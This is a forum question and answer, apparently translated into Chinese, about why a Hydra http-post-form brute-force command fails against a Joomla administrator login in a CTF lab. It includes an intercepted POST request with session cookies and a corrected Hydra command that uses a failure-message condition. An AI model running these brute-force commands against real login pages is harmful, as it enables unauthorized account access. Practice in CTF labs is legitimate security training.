0

我正在做一些 CTF,并在尝试将其用于发布请求时偶然发现了 Hydra 的问题。我已经知道如何解决这个问题,但我对 Hydra 感到困惑。

被打嗝拦截

POST /administrator/index.php HTTP/1.1
Host: 10.10.10.126    
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8   
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate 
Referer: http://10.10.10.126/administrator/index.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Connection: close    
Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1  
Upgrade-Insecure-Requests: 1

 
username=admin&passwd=test&option=com_login&task=login&return=aW5kZXgucGhw&71800a4b802098aac7f3bbd7e49a8665=1

我一直在谷歌上搜索,并尝试了几种不同的方法,但均未成功。我所做的是以下内容:

hydra -l jonah -P test.txt 10.10.10.126 http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&97f7e29809c1606df34ec3df81b10860=1:S=Warning:H=Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1"

-j 是正确的用户名,-P test.txt 包含正确的密码

有人可以告诉我我的请求有什么问题,为什么它没有成功?

4

1 回答 1

0

尝试像这样使用并将 <IncoorectVerbiage> 替换为“无效密码”之类的内容。

hydra -l jonah -P test.txt 10.10.10.126 http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&97f7e29809c1606df34ec3df81b10860=1:<IncorrectVerbiage>"
于 2021-08-22T16:06:01.240 回答